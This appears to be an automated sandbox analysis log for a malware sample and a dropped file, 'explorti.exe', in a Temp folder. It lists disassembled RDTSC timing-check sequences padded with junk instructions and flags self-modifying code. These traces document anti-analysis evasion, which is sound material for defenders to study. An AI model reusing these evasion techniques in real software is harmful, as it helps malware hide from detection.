Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80D94 second address: 4C80D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DAE second address: 4C80DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DB2 second address: 4C80DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DB8 second address: 4C80DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DDC second address: 4C80DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DF7 second address: 4C80DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80DFD second address: 4C80E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80E19 second address: 4C80E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30660 second address: 4C30666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30666 second address: 4C30686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED554h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30686 second address: 4C306CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD180B5C159h 0x0000000e pushad 0x0000000f mov ecx, 75AAF68Bh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a sub eax, 273A9698h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C306CF second address: 4C306D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C306D3 second address: 4C306D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C306D9 second address: 4C306DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C306DE second address: 4C3070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD180B5C162h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD180B5C15Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C3070F second address: 4C30721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30721 second address: 4C3078F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FD180B5C169h 0x00000014 pop eax 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a push 41C039FBh 0x0000001f pushad 0x00000020 mov dl, BBh 0x00000022 mov di, si 0x00000025 popad 0x00000026 xor dword ptr [esp], 373097FBh 0x0000002d jmp 00007FD180B5C162h 0x00000032 mov eax, dword ptr fs:[00000000h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C3078F second address: 4C307AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C307AC second address: 4C307BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C307BC second address: 4C30888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bh, A4h 0x00000010 pop eax 0x00000011 movsx edx, si 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Fh 0x0000001b nop 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD1807ED554h 0x00000023 sbb esi, 0BB028C8h 0x00000029 jmp 00007FD1807ED54Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 jmp 00007FD1807ED54Fh 0x00000035 pop eax 0x00000036 popad 0x00000037 sub esp, 1Ch 0x0000003a jmp 00007FD1807ED54Fh 0x0000003f xchg eax, ebx 0x00000040 jmp 00007FD1807ED556h 0x00000045 push eax 0x00000046 jmp 00007FD1807ED54Bh 0x0000004b xchg eax, ebx 0x0000004c jmp 00007FD1807ED556h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD1807ED557h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30888 second address: 4C30918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD180B5C15Fh 0x00000008 pop eax 0x00000009 mov bx, 048Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FD180B5C162h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD180B5C15Eh 0x0000001e add ch, FFFFFFD8h 0x00000021 jmp 00007FD180B5C15Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FD180B5C168h 0x0000002d sub cx, C238h 0x00000032 jmp 00007FD180B5C15Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FD180B5C165h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30918 second address: 4C3098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 jmp 00007FD1807ED553h 0x00000018 popfd 0x00000019 jmp 00007FD1807ED558h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 jmp 00007FD1807ED550h 0x00000025 mov eax, dword ptr [76FBB370h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED557h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C3098D second address: 4C309BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C15Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C309BC second address: 4C309C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C309C2 second address: 4C309C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C309C6 second address: 4C30A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, ecx 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FD1807ED558h 0x00000016 push eax 0x00000017 jmp 00007FD1807ED54Bh 0x0000001c nop 0x0000001d jmp 00007FD1807ED556h 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 pushad 0x00000026 movzx esi, dx 0x00000029 jmp 00007FD1807ED553h 0x0000002e popad 0x0000002f mov dword ptr fs:[00000000h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30A39 second address: 4C30A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30A54 second address: 4C30A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FD1807ED54Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED54Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30A93 second address: 4C30A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30A99 second address: 4C30ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov esi, 121E68CDh 0x00000011 jmp 00007FD1807ED54Ah 0x00000016 popad 0x00000017 jne 00007FD1F2A7C7ACh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD1807ED557h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30ADD second address: 4C30AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30AE3 second address: 4C30B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 mov dword ptr [ebp-20h], eax 0x00000018 jmp 00007FD1807ED558h 0x0000001d mov ebx, dword ptr [esi] 0x0000001f jmp 00007FD1807ED550h 0x00000024 mov dword ptr [ebp-24h], ebx 0x00000027 jmp 00007FD1807ED550h 0x0000002c test ebx, ebx 0x0000002e jmp 00007FD1807ED550h 0x00000033 je 00007FD1F2A7C673h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30B5C second address: 4C30B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30B60 second address: 4C30B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C30B66 second address: 4C30BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD180B5C15Eh 0x00000013 or ecx, 4C458CF8h 0x00000019 jmp 00007FD180B5C15Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C300CF second address: 4C300D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C300D5 second address: 4C3010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD180B5C166h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD180B5C15Ah 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503940 second address: 503944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503A9C second address: 503AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503AA2 second address: 503AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503AA8 second address: 503ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C166h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503ACB second address: 503AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503F03 second address: 503F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503F07 second address: 503F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503F10 second address: 503F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C162h 0x00000009 jnl 00007FD180B5C156h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C162h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 503F43 second address: 503F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 50651C second address: 50658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD180B5C156h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD180B5C164h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 50670F second address: 506713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506713 second address: 506736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD180B5C169h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506736 second address: 506759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506759 second address: 50675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 50675D second address: 506761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506761 second address: 5067B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD180B5C163h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD180B5C162h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD180B5C15Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD180B5C15Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506826 second address: 5068AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD1807ED557h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD1807ED54Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD1807ED54Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD1807ED549h 0x00000037 jmp 00007FD1807ED54Dh 0x0000003c push eax 0x0000003d jmp 00007FD1807ED54Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD1807ED550h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD1807ED548h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5068AF second address: 5068BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5068BA second address: 50694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD1807ED550h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD1807ED548h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD1807ED548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD1807ED551h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 50694D second address: 506953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506953 second address: 506957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 506957 second address: 5069B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD180B5C15Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD180B5C15Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD180B5C168h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5069B7 second address: 5069BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5069BD second address: 5069D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD180B5C15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD180B5C156h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 527B79 second address: 527B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 527B84 second address: 527B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD180B5C156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5263BB second address: 5263D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 5263D1 second address: 5263D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 526534 second address: 52653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 52681F second address: 526825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 52697A second address: 526984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Special instruction interceptor: First address: 46DE32 instructions caused by: Self-modifying code
